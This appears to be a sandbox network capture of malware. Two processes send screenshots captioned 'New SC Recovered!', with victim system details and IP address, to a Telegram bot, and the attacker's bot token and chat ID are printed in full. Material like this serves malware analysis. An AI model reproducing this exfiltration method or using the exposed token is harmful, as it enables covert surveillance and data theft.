2024-04-19 17:35:56 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 31 62 61 39 34 37 30 39 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 31 62 61 39 34 37 30 39 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 39 2f 32 30 32 34 20 32 30 3a 30 37 3a 32 35 0a 55 73 65 72
    Data Ascii: -----------------------------8dc801ba947090dContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc801ba947090dContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/29/2024 20:07:25User
2024-04-19 17:35:56 UTC | 16355 | OUT | Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
    Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
2024-04-19 17:35:56 UTC | 16355 | OUT | Data Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
    Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
2024-04-19 17:35:56 UTC | 16355 | OUT | Data Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
    Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
2024-04-19 17:35:56 UTC | 15447 | OUT | Data Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
    Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
2024-04-19 17:35:56 UTC | 1569 | OUT | Data Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
    Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
2024-04-19 17:35:56 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 31 62 61 39 34 37 30 39 30 64 2d 2d 0d 0a
    Data Ascii: -----------------------------8dc801ba947090d--
2024-04-19 17:35:56 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:35:56 UTC | 1485 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 19 Apr 2024 17:35:56 GMT
    Content-Type: application/json
    Content-Length: 1096
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":3445,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548156,"document":{"file_name":"user-618321 2024-05-29 20-12-27.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg11ZiKrfBrDeNVRXA4jltK-_5PnAAG1AAK5FwACi1IZUW6icK9SLLRiAQAHbQADNAQ","file_unique_id":"AQADuRcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg11ZiKrfBrDeNVRXA4jltK-_5PnAAG1AAK5FwACi1IZUW6icK9SLLRiAQAHbQADNAQ","file_unique_id":"AQADuRcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINdWYiq3waw3jVUVwOI5bSvv-T5wABtQACuRcAAotSGVFuonCvUiy0YjQE","file_unique_id":"AgADuRcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/29/2024 20:07:25\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49729 | 149.154.167.220 | 443 | 7324 | C:\Users\user\AppData\Roaming\vZkoWbol.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:36:03 UTC | 238 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dc781440ce2291
    Host: api.telegram.org
    Content-Length: 67138
    Expect: 100-continue
2024-04-19 17:36:03 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 31 34 34 30 63 65 32 32 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 31 34 34 30 63 65 32 32 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 39 2f 32 30 32 34 20 31 34 3a 34 34 3a 31 35 0a 55 73 65 72
    Data Ascii: -----------------------------8dc781440ce2291Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc781440ce2291Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/19/2024 14:44:15User
2024-04-19 17:36:03 UTC | 16355 | OUT | Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
    Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
2024-04-19 17:36:03 UTC | 16355 | OUT | Data Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
    Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
2024-04-19 17:36:03 UTC | 16355 | OUT | Data Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
    Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
2024-04-19 17:36:03 UTC | 15447 | OUT | Data Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
    Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
2024-04-19 17:36:03 UTC | 1552 | OUT | Data Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
    Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
2024-04-19 17:36:03 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 31 34 34 30 63 65 32 32 39 31 2d 2d 0d 0a
    Data Ascii: -----------------------------8dc781440ce2291--
2024-04-19 17:36:03 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:36:04 UTC | 1482 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 19 Apr 2024 17:36:04 GMT
    Content-Type: application/json
    Content-Length: 1093
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":3447,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548164,"document":{"file_name":"user-618321 2024-05-19 14-59-16.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg13ZiKrhLklJmH0vde4HngQgReObEUAArsXAAKLUhlRENuyLnpSwpcBAAdtAAM0BA","file_unique_id":"AQADuxcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg13ZiKrhLklJmH0vde4HngQgReObEUAArsXAAKLUhlRENuyLnpSwpcBAAdtAAM0BA","file_unique_id":"AQADuxcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINd2Yiq4S5JSZh9L3XuB54EIEXjmxFAAK7FwACi1IZURDbsi56UsKXNAQ","file_unique_id":"AgADuxcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 05/19/2024 14:44:15\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.549730149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:10 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc84175737ff0b
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:36:10 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 34 31 37 35 37 33 37 66 66 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 34 31 37 35 37 33 37 66 66 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 30 33 2f 32 30 32 34 20 32 31 3a 34 36 3a 33 30 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc84175737ff0bContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc84175737ff0bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/03/2024 21:46:30User
                                                                  2024-04-19 17:36:10 UTC  (5 chunks)         OUT        [JPEG file body omitted: five raw chunks of 16355, 16355, 16355, 15447 and 1552 bytes]
                                                                  2024-04-19 17:36:10 UTC  50                 OUT        Data Ascii: -----------------------------8dc84175737ff0b--
                                                                  2024-04-19 17:36:10 UTC  25                 IN         HTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:11 UTC  1482               IN         HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:11 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3448,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548171,"document":{"file_name":"user-618321 2024-06-03 21-51-36.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg14ZiKrixEMDFOrv0-MqS5OQUzVbIwAArwXAAKLUhlRjz2FjZtYOeIBAAdtAAM0BA","file_unique_id":"AQADvBcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg14ZiKrixEMDFOrv0-MqS5OQUzVbIwAArwXAAKLUhlRjz2FjZtYOeIBAAdtAAM0BA","file_unique_id":"AQADvBcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINeGYiq4sRDAxTq79PjKkuTkFM1WyMAAK8FwACi1IZUY89hY2bWDniNAQ","file_unique_id":"AgADvBcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/03/2024 21:46:30\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                  17          192.168.2.5  49731        149.154.167.220  443               7324  C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-04-19 17:36:31 UTC  238                OUT        POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc7d9f4e31c274
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:31 UTC  1024               OUT        Data Ascii: -----------------------------8dc7d9f4e31c274Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc7d9f4e31c274Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/26/2024 16:12:13User
                                                                  2024-04-19 17:36:31 UTC  (5 chunks)         OUT        [JPEG file body omitted: five raw chunks of 16355, 16355, 16355, 15447 and 1552 bytes]
                                                                  2024-04-19 17:36:31 UTC  50                 OUT        Data Ascii: -----------------------------8dc7d9f4e31c274--
                                                                  2024-04-19 17:36:31 UTC  25                 IN         HTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:32 UTC  1482               IN         HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:32 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
